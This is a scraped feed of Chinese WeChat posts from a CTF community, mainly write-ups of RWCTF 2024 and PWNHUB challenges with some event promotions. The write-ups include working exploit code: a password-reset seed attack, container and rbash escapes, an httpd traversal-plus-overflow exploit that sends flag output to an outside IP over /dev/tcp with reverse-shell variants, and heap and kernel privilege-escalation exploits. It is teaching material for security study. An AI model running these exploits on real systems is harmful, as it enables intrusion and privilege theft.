import loggingimport sysimport randomimport stringimport argparsefrom urllib.parse import urljoinlogging.basicConfig(stream=sys.stdout, level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')string_punctuation = '!#$%&()*+,-.:;<=>?@[]^_~'import requests_htmlimport urllib3urllib3.disable_warnings()session = requests_html.HTMLSession()session.headers = {    "Connection": "close",    "Cache-Control": "max-age=0",    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.30 Safari/537.36",    "Accept-Encoding": "deflate",    "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",}session.verify = Falsesession.proxies =  {    'http':"http://127.0.0.1:48080",    'https': "http://127.0.0.1:48080",}def random_string(length: int, lower=True, upper=True, digit=True, special_char=False):    args_names = ['lower', 'upper', 'digit', 'special_char']    args_values = [lower, upper, digit, special_char]    args_string = [string.ascii_lowercase, string.ascii_uppercase, string.digits, string_punctuation]    args_string_map = dict(zip(args_names, args_string))    kwargs = dict(zip(args_names, args_values))    kwargs_keys = list(kwargs.keys())    kwargs_values = list(kwargs.values())    args_true_count = len([i for i in kwargs_values if i])    assert any(kwargs_values), f'Parameters {kwargs_keys} must have at least one `True`'    assert length >= args_true_count, f'Expected length >= {args_true_count}, bug got {length}'    can_startswith_special_char = args_true_count == 1 and special_char    chars = ''.join([args_string_map[k] for k, v in kwargs.items() if v])    while True:        password = list(random.choice(chars) for i in range(length))        for k, v in kwargs.items():            if v and not (set(password) & set(args_string_map[k])):                # 没有包含指定的字符, retry                break        else:            if not can_startswith_special_char and password[0] in args_string_map['special_char']:                # 首位不能为特殊字符, retry                continue            else:                # 满足要求终止 while 循环                break    password = ''.join(password)    return passworddef nop_random(seed: str):    CAPTCHA_IMAGE_SIZE = (78, 31) # Change This    size = CAPTCHA_IMAGE_SIZE    random.seed(seed)    for i in range(4):        random.randrange(-35, 35,1)    for p in range(int(size[0] * size[1] * 0.1)):        random.randint(0, size[0])        random.randint(0, size[1])def fix_seed(target: str, seed: str):    def _request(i: int, u: str):        logging.info('send %d request to %s', i, u)        response = session.get(u, timeout=5)        assert response.status_code == 200        assert response.headers['Content-Type'] == 'image/png'    url = urljoin(target, '/captcha/image/' + seed + '/')    for idx in range(0,1):        _request(idx, url)def send_code(target: str, name:str,email: str,args):    url = urljoin(target, "/reset-password/" )    session.headers['Cookie'] ="csrftoken="+args.cscookie    response = session.post(url, data={        'email': email,        'username': name,        'csrfmiddlewaretoken': args.cstoken,    }, allow_redirects=False,headers=session.headers)    assert response.status_code == 200    logging.info("send code headers: %r response: %r", response.headers, response.text)def do_setup_password(target: str):    url = urljoin(target, "/do-reset-password/" )    response = session.get(url,allow_redirects=False)    logging.info("send code headers: %r response: %r", response.headers, response.text)def main(target: str,name:str, email: str, seed: str,args):    fix_seed(target, seed)    nop_random(seed)    send_code(target, name,email,args)    do_setup_password(target)    code = random_string(6, lower=False, upper=False)    print(code)    # logging.info("your code is %s", code)if __name__ == "__main__":    parser = argparse.ArgumentParser(description='Process some integers.')    parser.add_argument('-t', '--target', type=str, required=True, help='target url')    parser.add_argument('--name', type=str, required=True, help='account name')    parser.add_argument('--email', type=str, required=True, help='account email')    parser.add_argument('--seed', type=str, required=True, help='seed from captcha url')    parser.add_argument('--cscookie', type=str, required=True, help='csrf cookie')    parser.add_argument('--cstoken', type=str, required=True, help='csrf token')    args = parser.parse_args()    main(args.target,args.name, args.email, args.seed,args)

这里可以得到验证码为: 788593


使用重置好的密码进行登录,即可在后台获取flag



07
Be-a-Security-Research



Webdifficulty:Baby


直接使用 jenkins-cli 利用即可:

java -jar jenkins-cli.jar -s http://xxxx/ -http who-am-i "@/flag"



08
Be-a-Docker-Escaper-4



Pwndifficulty:Normal


这个题目的出题思路来自于:https://www.anquanke.com/post/id/290540 这篇文章。选手成功通过 ssh 成功连接上环境后,会发现这是一个容器环境,而且通过 ps -aux

命令能看到这个容器的启动命令:

1000        1113  0.0  0.0   6188   992 pts/0    S+   06:25   0:00 sleep 100001000        1114  0.0  2.3 1180376 23264 pts/0   Sl+  06:25   0:00 docker run --rm -it --pid=host --security-opt=apparmor=unconfined ubuntu bash

可以发现该容器共享了 pid, 因此能通过 ps命令看到容器外的进程。此外还有一个 uid 为 1000 的 sleep 进程。 预期解法如下:

#!/bin/shpid=$(pidof sleep)useradd -u 1000 usersu user -c "cat /proc/$pid/root/flag1"

创建一个 uid 为 1000 的用户, 然后通过读 sleep 进程下的 /proc/$PID/root 的文件就能读到 flag。



09
Be-a-Cloud-Hacker



Miscdifficulty:Baby


当成功获取 Be-a-Docker-Escaper-4的容器外权限后, 我们可以先把权限提升到root, 通过题目描述,我们需要找到 user这个用户的密码。 最终可以在 cloud init的目录下找到 user-data.txt里面存储了 cloud init的配置文件, 能找到一个明文密码, 完整的利用如下:

#!/bin/shapt updateapt install docker.iopid=$(pidof sleep)groupadd -g 1001 useruseradd -m -g 1001 -u 1000 usergroupadd -g 1000 docker # modify /etc/group# root@e2bbe4774805:/# cat /etc/group | grep docker# docker:x:1000:userusermod -aG docker usersu user -c "cat /proc/$pid/root/flag1"su userpid=$(pidof sleep)docker -H unix:///proc/$pid/root/run/docker.sock run -it --privileged ubuntu bash# docker -H unix:///proc/$pid/root/run/docker.sock ps -a#  ---- The commands running in the privileged container are as follows ----# mkdir /tmp/a# mount /dev/sda1 /tmp/a# chmod 777 /tmp/a/var/lib/cloud/instances/*/user-data.txt# cat /tmp/a/var/lib/cloud/instances/*/user-data.txt |grep rwctf



10
vision



Pwndifficulty:Baby


连上之后会发现这是一个 Restricted shell , 其支持的命令有如下:

 ping, uname, pwd, date, whoami, poweroff, id, showKey, openthedoor

预期的题目解法是通过逆向发现, 判断是否合法的命令的时候的代码如下:

  len = strlen(s2);    if ( len )    {      v7 = 0;      v10 = support_command_list[0];      while ( strncmp(v10, s2, len) )      {        v10 = support_command_list[++v7];        if ( !support_command_list[v7] )        {          strcpy(a2, "Not Support 4. \n");          return __readfsqword(0x28u) ^ v23;        }      }

其中 s2 是用户的输入, 因此会发现strncmp的第三个参数也是用户可控的,因此这里有个经典的截断问题。当我们输入 sh的时候, 会出现这样的情况: strncmp("showKey", "sh", 2), 因此我们可以通过如下的方法获取 flag

sh -c "cat ./flag"

此外我们发现有些选手用了 date -f /flag 的方法读到了 flag。



11
Be-an-HTTPd-Hacker



Pwndifficulty:Normal


这个题目直接使用了开源代码https://github.com/bnlf/httpd/。这份代码存在至少两个漏洞:

1.  跨目录读取文件。攻击者传入的文件路径未做任何处理直接拼接,通过../可以实现任意文件读取。因为权限问题该漏洞不能直接读取flag,但可以被用来读取/proc/[httpd-pid]/maps实现信息泄露。

// https://github.com/bnlf/httpd/blob/master/src/httpd.c#L69    strcpy(fileBuffer, WWW_ROOT);    // Arquivo do request  if(req.uri) {    strcat(fileBuffer, req.uri);    }  // Se terminado em /, abre o arquivo padrao  if(strcmp(&fileBuffer[strlen(fileBuffer)-1], "/") == 0) {    strcat(fileBuffer,"index.html");  }  // Verifica se arquivo existe no servidor  if(stat(fileBuffer, &st) == -1) {    res.status = 404; // File not Found    res.fileName = "404.html";  } else {    res.status = 200; // ok    res.fileName = fileBuffer;  }

2. 栈溢出。以下代码的while循环会将HTTP body中的键值对按照<tr><td>%s</td>和<td>%s</td></tr>的格式进行扩展,然后拷贝到栈上固定长度(MAXLINE)的缓冲区中。这里虽然原始输入的长度不能超过MAXLINE,但多次循环、经过扩展后最终的长度可以超过MAXLINE,发生栈溢出。

// https://github.com/bnlf/httpd/blob/master/src/httpd.c#L183    char buffer[MAXLINE];  //Prepara cabecalho HTML  sprintf(buffer, "<html><head><title>Submitted Form</title></head>");  //Cria body  strcat(buffer, "<body><h1>Received variables</h1><br><table>");  strcat(buffer, "<tr><th>Variables</th><th>Values</th></tr>");    char * pch;    char temp[250];  pch = strtok (linePost,"&=");  while (pch != NULL)  {    sprintf(temp, "<tr><td>%s</td>", pch);    strcat(buffer, temp);    pch = strtok (NULL, "&=");    sprintf(temp, "<td>%s</td></tr>", pch);    strcat(buffer, temp);    pch = strtok (NULL, "&=");  }

两个漏洞连用,攻击者可以实现任意代码执行。exploit代码如下:

#!/usr/bin/env python3from pwn import *import syscontext.arch = "i386"context.log_level = "debug"elf = ELF("./httpd", checksec = False)libc = ELF("./libc.so.6", checksec=False)# libc = elf.libchost = "127.0.0.1"#port = 39188port = int(sys.argv[1])def retrieve_file(path):    payload = f'''GET /../../../../../../../../../../../..{path} HTTP/1.1\r\n\r\n'''    io = remote(host, port)    io.send(payload.lstrip().encode("latin-1"))    cont = io.recv()    if b'HTTP/1.1 200 OK\r\n' in cont:        cont = io.recv()    io.close()    return contdef leak():    for pid in range(0, 200):        elf_path = b"/home/httpd"        libc_path = b"usr/lib/i386-linux-gnu/libc.so.6"        file = f"/proc/{pid}/maps"        cont = retrieve_file(file)        # print(cont)        try:            maps = cont.split(b"\r\n\r\n")[1]            # print(maps)            # breakpoint()            if elf_path in maps:                # print("find {}".format(pid))                heap = 0                stack = 0                for line in maps.split(b"\n"):                    address_range, permissions, offset, device, inode, mapped_file = line.split()[:6] if len(line.split()) >= 6 else (b"", b"", b"", b"", b"", b"")                    if heap == 0 and b"[heap]" in mapped_file:                        heap = int(address_range.split(b"-")[0], 16)                        print("heap @ {:#x}".format(heap))                        continue                    if stack == 0 and b"[stack]" in mapped_file:                        stack = int(address_range.split(b"-")[0], 16)                        print("stack @ {:#x}".format(stack))                        continue                    if elf.address == 0 and elf_path in mapped_file:                        elf.address = int(address_range.split(b"-")[0], 16)                        # breakpoint()                        print("elf @ {:#x}".format(elf.address))                        continue                    if libc.address == 0 and libc_path in mapped_file:                        libc.address = int(address_range.split(b"-")[0], 16)                        print("libc  @ {:#x}".format(libc.address))                        # breakpoint()                        continue                    if (heap & stack & elf.address & libc.address) != 0:                        return (heap, stack)        except:            print("error")            continue    else:        print("not found")        exit(-1)def overflow(addrs):    heap, stack = addrs    io = remote(host, port)    # 0x30 + 0x2c + 0x2a = 0x86    # 0xf: '<tr><td>\nk</td>'    # 0xf: '<td>v</td></tr>'    # 0xe: '<tr><td>k</td>'    # 0xf: '<td>v</td></tr>'    padding =  b"k=v&" * 0x88 # 0x88 * (0xe + 0xf) + 1 + 0x86 = 0xfef    padding += b"p=" # 0xfef + 0xe("<tr><td>p</td>") + 0x4("<td>") = 0x1001    '''-00001028 buffer db 4096 dup(?)-00000028 res_1 response ?-0000001C var_1C dd ?-00000018 req_1 request ?-0000000C var_C db 12 dup(?)+00000000  s db 4 dup(?)+00000004  r db 4 dup(?)+00000008 arg_0 request ?+00000014 arg_C response ?+00000020 connfd dd ?+00000024 linePost dd ?    '''    '''/*** Estrutura da resposta.* @status: id do status de retorno* @vProtocol: Versao do protocolo HTTP* @fileName: Nome do arquivo em disco da requisicao*/typedef struct {  int status;  char *vProtocol;  char *fileName;} response;    '''    payload =  b'111' # res.status    payload += flat(elf.address + 0x306b) # res.vProtocol    payload += flat(stack + 0x1c29c) # res.fileName    payload += b'aaaa' # padding    '''/*** Estrutura da requisição.* @method: Tipo de requisicao (GET/POST)* @uri: Endereco para arquivo no servidor* @vProtocol: Versao do protocolo HTTP*/typedef struct {  char *method;  char *uri;  char *vProtocol;} request;    '''    payload += flat(elf.address + 0x3008) # req.method    payload += flat(stack + 0x191fc) # req.uri    payload += flat(elf.address + 0x305c) # req.vProtocol    payload += b'bbbbbbbbbbbb' # padding    payload += b'cccc' # ebp    # ropchain = flat(0xdeadbeef)    # ropchain += cyclic(0x20)    ropchain = flat([        libc.sym["system"],        0x12345678,        #stack + stack_offset,        #stack + 0x1c4e8,        #heap + 0x81a        heap + 0x141a        #0x57c7381a    ])    # cmd = b"""perl -MIO::Socket::INET -e '$c=new IO::Socket::INET(PeerAddr,"127.0.0.1:54321");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;';#"""    # https://gchq.github.io/CyberChef/#recipe=To_Hex('%5C%5Cx',0)&input=YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY%2BL2Rldi90Y3AvMTI3LjAuMC4xLzU0MzIxIDwmMSc    # cmd = br"""echo -e 'bash -c "exec bash -i \x26>/dev/tcp/127.0.0.1/54321 <\x261"' > /tmp/1;sh /tmp/1;#"""    # cmd = br"""printf '/bin/bash -c "exec bash -i \x26>/dev/tcp/123.57.212.189/54321 <\x261"' > /tmp/1;sh /tmp/1;#"""    cmd = br"""printf '/bin/bash -c "exec /readflag > /dev/tcp/123.57.212.189/54321 "' > /tmp/1;sh /tmp/1;#"""    # cmd = b"""id > /tmp/123;#"""    payload += ropchain # ret addr    payload += cmd    assert b"\n" not in ropchain    assert len(payload) < 250 - 14    raw_payload = padding + payload    buffer =  b"POST /index.html HTTP/1.1\r\n"    buffer += b"\r\n"    # buffer =  buffer.ljust(0x1000, b'a')    buffer += raw_payload    buffer += b"\r\n"    buffer += raw_payload # last line    #print(hexdump(buffer))    assert len(buffer) <= 0x1000    assert b'\x00' not in payload    io.send(buffer)    sleep(0.01)    # options = b"x" * 0x1000    # io.send(options)addrs = leak()# print(retrieve_file("/proc/39/maps"))# pause()overflow(addrs)#for stack_offset in range(0x10000, 0x20000):#    try:#        overflow(addrs, stack_offset)#    except Exception as e:#        pass

PS: 附件提供了启动脚本launcher.py来确保本地和远程的内存偏移



12
Be-an-Interpreter-Hacker





13
ALS



Pwndifficulty:Normal


事情的起因是刘大爷上个月的时候发现的一个非常有趣的github项目。

https://github.com/wikihost-opensource/als

这个项目在3周前经历了一次巨大的重构。这一次使用的是v1版本的代码。代码版本和仓库的链接可以通过直接读main.py的源代码得知。

看首页可以看到。项目有提供一个shell。随便跑点命令就可以发现是一个受限的shell。阅读源码查看沙箱构建的方式和权限。

只是一个降权的rbash,继续查看fakeroot的构建代码可以发现:

导入了awk。那接下来就简单了,直接用awk逃rbash。

awk 'BEGIN {system(\"/bin/sh\")}'export PATH=/usr/bin:/bin:/usr/local/bin/

接下来查看flag位置。发现flag在/root下。属于root并且权限为000。因此接下来的步骤就是提权。再次翻看代码就可以发现。

项目给了nexttrace sudo的权限可以以root执行。

接下来就是非预期的部分了。由于时间隔得比较久,加上部署这个题目的时候已经是体验赛开赛前的凌晨4点。实在有点神志不清。忘记了netrace可以直接读取文件内容了。因此只需要nexttrace --file /root/flag即可

接下来来说一说预期的。需要拿root shell才能解的做法:

首先发现nexttrace有-o参数可以指定输出结果到文件。但是再次研究发现-o不能指定写入的位置。只能写到/tmp/trace.log这个文件中。那么很容易就能想到应该用Symbolic Attack。 并且题目描述中也特意提到了关闭了Symbolic Attack保护(虽然非预期了)。

如此一来面临的问题就只有两个了。如何控制nexttrace输出的内容。以及写入哪个文件。

第一个问题,查看nexttrace源码和项目描述就可以看到。nexttrace支持从本地文件中读取ip信息数据库并进行查询:

因此只需要提供一个自定义的ip数据库。将ip所在地替换成我们需要的payload即可。查看源码可以看到。数据库来自一个名为ip2region的项目。

当然值得注意的是。nexttrace使用的ip2region的作者和als的作者一样。已经把v1版本的的代码整个扬了。只能从release下载的文件里还能看到v1版本的代码。

编写ip数据记录并生成数据库。

可以看到输出中已经有了我们的payload。

至于写到哪里就比较简单了。还是看刚才我们看过的rbash的启动代码。可以发现最后一行并不是exec的。因此nexttrace追加写入到该文件(/app/utilities/start_fakeroot.sh)。那么在shell退出之后会继续执行命令。导致root权限的任意代码执行。



14
Long Range 2




阅读原文

跳转微信打开

]]> Sun, 04 Feb 2024 18:18:00 +0800 今晚开赛|最强大脑入局RWCTF,CTFer「贴脸开大」 https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247501512&idx=1&sn=3618406259020aa9a3a52f6db70dbf7d 开赛之夜,希望大家wonder尽兴! 长亭科技 2024-01-26 12:53 北京

开赛之夜,希望大家wonder尽兴!



今天19:00点
第六届Real World CTF正式开赛
最强大脑“脑王”入局围炉夜话
18:00开聊
欢迎围观

正式打广告前来个走心局
长亭为什么一直坚持办RWCTF?
答案在这里👇 👇 👇

 



      我们希望,RWCTF能够成为一个每年在全球范围内有影响力的安全Party,吸引更多安全研究人员和安全爱好者参与到Real World的年度狂欢中。

—— Real World CTF创始人杨坤



所以  这是一 场



 狂欢局

“这不是轻易能获得的快乐,

  玩儿过的人都明白”


今天,上千名CTF深度爱好者如约而至。在线上,他们一起体验48小时的技术极限快感、畅游十余个前沿领域交织而成的赛题海洋、在虚拟3D场景中捕捉传说中的clone&pwn……





 对战局

“出题组最好把ID留在题目里”


ID是不可能留的,但是今年我们不仅手把手教你如何打CTF,还提前送上赛事锦囊。即便如此,出题组给大家的祝福依然是:“能多做一题是一题”“希望玩儿的开心”🤷

欲知对战结果如何,赛后选手连麦环节见!





 深度局

“失控的可能是人,而不是那个AI”


每一年,RWCTF都在用技术与世界对话。从敬畏生命韵律的“抗疫”募捐,到用技术书写更高更快更强的“奥林匹克”,从探索宇宙万物变化的“第五元素”到AI浪潮中徘徊在虚拟与现实边界之处的“第四面墙”。

作为计算机世界的顶级“猎手”,他们如何看待技术的浪潮?




 CTFer

“贴脸开大”局

 “您,请说” 


Q:“最强大脑对打CTF有什么帮助吗?”
Q:“CTF最讨厌哪一类题目?”
Q:“在全国最顶级的队伍打比赛是种什么体验?”
... ...

答案都在这里👇👇👇

RWCTF 2024 开赛之夜
B站直播,同步开启


RWCTF 2024 荣耀之夜
B站直播,同步开启





点击阅读原文跳转“长亭科技”公众号

在原文

评论区留言或提问

在【开赛之夜】被CTF大佬

“翻牌”互动!

被“翻牌”的幸运儿将同时获赠

【RWCTF 2024定制卫衣】


点击左下角跳转原文



阅读原文

跳转微信打开

]]> Fri, 26 Jan 2024 12:53:00 +0800 贺岁片|我是长亭科技,2024年焕新亮相! https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247501430&idx=1&sn=782199f834c174971e489572b63dc02e 今天,咱来看点不一样的 长亭科技 2024-01-22 14:35 北京

今天,咱来看点不一样的


·


阅读原文

跳转微信打开

]]> Mon, 22 Jan 2024 14:35:00 +0800 干货|print("Real World CTF解题攻略限时特供") https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247501426&idx=1&sn=03e70f6b691aba8f398e178e17a36a56 见者有缘~ 长亭科技 2024-01-15 11:11 北京

见者有缘~


·
·
·
·
·
·

阅读原文

跳转微信打开

]]> Mon, 15 Jan 2024 11:11:00 +0800 Hack for the Real | 这一次,以极客之名,为真实而战! https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247501418&idx=1&sn=b0a2da3a3c97ba02b9939ea06ecd3c8d 好久不见,它来啦它来啦~~ ♥️高校体验赛「Be A CTFer」报名启动!各位高校选手可以在胖哈勃公众号后台私信“我要参加高校体验赛”获取邀请函!! 长亭科技 2023-12-29 17:00 北京

好久不见,它来啦它来啦~~

♥️高校体验赛「Be A CTFer」报名启动!各位高校选手可以在胖哈勃公众号后台私信“我要参加高校体验赛”获取邀请函!!


·
·
·


阅读原文

跳转微信打开

]]> Fri, 29 Dec 2023 17:00:00 +0800 三月比赛writeup|快来领取 https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247501413&idx=1&sn=071bf67348d1ec0f0f49d3704d3af876 2023-03-15 18:20 北京

胖哈勃三月份
公开赛&内部赛完结
再次感谢各位胖友们的支持🎉🎉

公开赛&内部赛writeup已整理完毕
内部赛-->
请访问比赛平台及时领取
https://pwnhub.cn/gamedetail?id=51

2023

内部赛前五名选手名单


快来领取你的奖品


m0rx

wjh

ylz

1amfree

没有头猪


祝贺以上胖友在本次内部赛中的突出表现👏
除了获取内部积分及相应的金币奖励外
还将获取RW2023手办1个
(请及时联系小胖哥vx领取:15711220440)



再再次感谢各位胖友的支持

我们下次比赛见!






PWNHUB(昵称:胖哈勃),遥远的1990年,哈勃望远镜拓展了人类仰望星空的界限。2016年,PWNHUB诞生,将引领那些对网络安全感兴趣的人们探索“01”世界中的无限奥秘……

 

PWNHUB致力打造顶尖网络安全攻防交流平台,为网络安全爱好者与研究者提供一个碰撞思维、提升技术的线上场所。PWNHUB崇尚自由探索的极客精神,以高质量的纯原创题目汇集了一大批高水平的CTF选手与战队。

阅读原文

跳转微信打开

]]> Wed, 15 Mar 2023 18:20:00 +0800 【PWN专场】公开赛wp|sh_v1_1 https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247501413&idx=2&sn=9c0b12fc3802278a2fc23e9c801840b8 2023-03-15 18:20 北京

1.题⽬名称

题目名称:sh_v1_1

2.题⽬考点

  • 本题考查对程序指令逆向

  • 对花指令等干扰指令排除

  • UAF

3.题⽬详细解题⽅法

首先,程序中的花指令如下

是可以排除干扰的

程序主要实现了ls,rm,touch,cat,gedit等功能

漏洞点主要在ln函数,ln函数链接时,将指针保存,但是在对原始指针删除时,未删除ln链接的指针,造成指针悬挂。

exp:

#coding=utf-8
from pwn import *
context.log_level = "debug"# context.arch = "i386"context.arch = "amd64"
menu=""sh = 0lib = 0elf =ELF('sh_v1_1')libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
""" """l64 = lambda     :u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))l32 = lambda     :u32(sh.recvuntil("\xf7")[-4:].ljust(4,"\x00"))leak  = lambda name,data : sh.success(name + ": 0x%x" % data)s  = lambda payload: sh.send(payload)sa  = lambda a,b :sh.sendafter(str(a),str(b))sl  = lambda payload: sh.sendline(payload)sla = lambda a,b :sh.sendlineafter(str(a),str(b))ru  = lambda a     :sh.recvuntil(str(a))r  = lambda a     :sh.recv(str(a))""" """def add(name,content):  sla(">>>>","touch "+name)  sl(content)def edit(name,content):  sla(">>>>","gedit "+name)  s(content)def show(name):  sla(">>>>","cat "+name)def delete(name):  sla(">>>>","rm "+name)def ln(name,name1):  sla(">>>>","ln "+name+" "+name1)def b(addr):  bk="b *$rebase("+str(addr)+")"  # bk="b *"+str(addr)  attach(sh,bk)  success("attach")def pwn(ip,port,debug):  global sh  global libc  if(debug == 1):     sh = process("./sh_v1_1")  else:     sh = remote(ip,port)
  for i in range(0,10):     add("freedom"+str(i),"freedom!!!")  ln("freedom0","freedom10") #freedom0 uaf freedom10  for i in range(1,8):     delete("freedom"+str(i))  delete("freedom0")  show("freedom10")  libc_base=l64()-0x10-libc.sym["__malloc_hook"]-96  leak("libc_base",libc_base)   for i in range(0,8):     add("freedom"+str(i),"freedom!!!")
  delete("freedom1")  delete("freedom7")
  system=libc_base+libc.sym["system"]  free_hook=libc_base+libc.sym["__free_hook"]-8
  edit("freedom10",p64(free_hook)+"\n")  # b(0x000000000000219A)  add("freedom1","aaaa")  add("freedom7","/bin/sh\x00"+p64(system))  delete("freedom7")  sh.interactive()if __name__ == "__main__":  pwn("0.0.0.0",9999,1)


阅读原文

跳转微信打开

]]> Wed, 15 Mar 2023 18:20:00 +0800 【PWN专场】公开赛wp|kheap https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247501413&idx=3&sn=652b24d4dbe04cfe0b21b0893a97f246 2023-03-15 18:20 北京

1.题目名称

kheap

2.题目考点

seq_operation结构体的劫持(UAF)

3.题目详细解题方法

劫持seq_operations结构体,该结构体为一个函数虚表。而在read(seq,ptr,0);时会执行上文中的代码,劫持该结构体的指针就能劫持RIP。

而由于该调用处没有可用的函数指针,因此通过xchg eax,esp来进行栈劫持。

eax为劫持的gadget的低位,这个低位则会落入用户态的页表中。

通过该方法进行栈劫持,在用户态的段中部署ROP提权

gcc -o main main.c -static生成main文件,在将该文件传入qemu虚拟机中,执行该文件即可提权。

exp:

#include <stdio.h>#include <fcntl.h>#include <stdlib.h>#include <string.h>#include <stdint.h>#include <assert.h>#include <signal.h>#include <unistd.h>#include <syscall.h>#include <pthread.h>#include <poll.h>#include <linux/userfaultfd.h>#include <linux/fs.h>#include <sys/shm.h>#include <sys/msg.h>#include <sys/ipc.h>#include <sys/ioctl.h>#include <sys/types.h>#include <sys/stat.h>#include <sys/mman.h>#include <sys/socket.h>#include <sys/syscall.h>
#define PAGE_SIZE 0x1000
struct info{  uint64_t idx;  char *ptr;};
struct request{  char *ptr;  uint64_t len;};

int dev_fd;uint64_t user_cs,user_ss,user_eflag,user_rsp;
void save_state(){  asm(    "movq %%cs, %0;"    "movq %%ss, %1;"    "movq %%rsp, %3;"    "pushfq;"    "pop %2;"    : "=r"(user_cs),"=r"(user_ss),"=r"(user_eflag),"=r"(user_rsp)    :    : "memory"  );}
void new(uint64_t idx){  struct info arg={idx,NULL};  ioctl(dev_fd,0x10000,&arg);}
void delete(uint64_t idx){  struct info arg={idx,NULL};  ioctl(dev_fd,0x10001,&arg);}
void choose(uint64_t idx){  struct info arg={idx,NULL};  ioctl(dev_fd,0x10002,&arg);}
int seq_open(){  int seq;  if ((seq=open("/proc/self/stat",O_RDONLY))==-1)  {    puts("[X] Seq Open Error");    exit(0);  }  return seq;}
void get_shell(){  system("/bin/sh");  exit(0);}
int main(){  save_state();  dev_fd=open("/dev/kheap",O_RDWR);  if (dev_fd<0)  {    puts("[X] Device Open Error");    exit(0);  }  
  uint64_t *buf=malloc(0x20); uint64_t *recv=malloc(0x20);    new(0);  choose(0);  delete(0);    int seq_fd=seq_open();    read(dev_fd,(char *)recv,0x20);    uint64_t kernel_base=recv[0]-0x33F980;  uint64_t prepare_kernel_cred=kernel_base+0xcebf0;  uint64_t commit_creds=kernel_base+0xce710;  uint64_t kpti_trampoline=kernel_base+0xc00fb0;  uint64_t seq_read=kernel_base+0x340560;  uint64_t pop_rdi=kernel_base+0x2517a;  uint64_t mov_rdi_rax=kernel_base+0x5982f4;  uint64_t gadget=kernel_base+0x94a10;    printf("[+] kernel_base: 0x%lx\n",kernel_base);  printf("[+] prepare_kernel_cred: 0x%lx\n",prepare_kernel_cred);  printf("[+] commit_creds: 0x%lx\n",commit_creds);    uint64_t *mmap_addr=mmap((void *)(gadget&0xFFFFF000),PAGE_SIZE,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANONYMOUS|MAP_SHARED,-1,0);  printf("[+] mmap_addr: 0x%lx\n",(uint64_t)mmap_addr);    uint64_t *ROP=(uint64_t *)(((char *)mmap_addr)+0xa10),i=0;  *(ROP+i++)=pop_rdi;  *(ROP+i++)=0;  *(ROP+i++)=prepare_kernel_cred;  *(ROP+i++)=commit_creds;  *(ROP+i++)=kpti_trampoline+22;  *(ROP+i++)=0;  *(ROP+i++)=0;  *(ROP+i++)=(uint64_t)get_shell;  *(ROP+i++)=user_cs;  *(ROP+i++)=user_eflag;  *(ROP+i++)=user_rsp;  *(ROP+i++)=user_ss;    memcpy(buf,recv,0x20);  buf[0]=(uint64_t)gadget;  write(dev_fd,(char *)buf,0x20);  read(seq_fd,NULL,1);
}


阅读原文

跳转微信打开

]]> Wed, 15 Mar 2023 18:20:00 +0800 胖哈勃比赛|真正的无PWN不欢 https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247501280&idx=1&sn=b1eadbbf8bd452e1413ef5cde15441ab 体验当一次真正的pwn友~ 2023-03-06 18:00 北京

体验当一次真正的pwn友~

距离上一场比赛过去  ?

距离上一场专场赛过去  ?? 

距离上一场 PWN专场赛过去 ???

胖胖什么都不记得了,胖胖也很疑惑

????
停!!什么,PWN专场?

是的是的,PWN专场它来了!

而且,公开赛和内部赛它们一起来了!!

快来看看新一期的比赛安排吧!!!

 壹|公开赛

比赛时间:3月1110:00—3月14日10:00 (共72h)

题目类型:PWN专场

比赛网址:https://pwnhub.cn/publicgame

比赛Q群:961142262

注意:公开赛所有人员均可参与,无需赛前报名。参与公开赛解出1题及wp审核通过即可获取邀请码一枚~,需要邀请码的小伙伴一定不要错过哈,社区内部成员参与答题不再重复发放邀请码~

 贰|内部赛

比赛时间:3月1110:00—3月12日10:00 (共24h)

题目类型:PWN专场

比赛网址:https://pwnhub.cn/gamedetail?id=51

比赛Q群:961142262

内部赛奖品:正确解题即可获取题目相应的丰富积分及金币奖励,另外本期内部专场赛事前5名将获取RW2023限量小龙手办一个!!

注意:内部赛需要提前报名!!提前报名!!!







PWNHUB(昵称:胖哈勃),遥远的1990年,哈勃望远镜拓展了人类仰望星空的界限。2016年,PWNHUB诞生,将引领那些对网络安全感兴趣的人们探索“01”世界中的无限奥秘……

 

PWNHUB致力打造顶尖网络安全攻防交流平台,为网络安全爱好者与研究者提供一个碰撞思维、提升技术的线上场所。PWNHUB崇尚自由探索的极客精神,以高质量的纯原创题目汇集了一大批高水平的CTF选手与战队。

阅读原文

跳转微信打开

]]> Mon, 06 Mar 2023 18:00:00 +0800 新年快乐,内置专属红包封面 https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247501219&idx=1&sn=d0b9816c3d1a5bb56d69cfa7fe977287 叮!兔年限定红包封面来咯~ 2023-01-13 17:30 北京

叮!兔年限定红包封面来咯~

 

新的一年来临了

 再见2022,向所有的烦恼说拜拜!

2023你好!继续奔走在自己的热爱里。


新的一年里,胖哈勃将继续与你同行,并带来了

兔年限定红包封面!


春节可爱兔兔红包封面限量200个,手慢无!





阅读原文

跳转微信打开

]]> Fri, 13 Jan 2023 17:30:00 +0800 第五届 Real World CTF 体验赛 Writeup https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247500498&idx=1&sn=bd9268dd11e735fb4b2fd14d5aa4efcc 别忘了 星标我!1月7日-8日,24小时 第五届 Real World CTF 体验赛落下帷幕来自企业、高 RWCTFer 2023-01-11 18:15 北京

别忘了 星标我!1月7日-8日,24小时 第五届 Real World CTF 体验赛落下帷幕来自企业、高

别忘了
  星标我!


1月7日-8日,24小时 

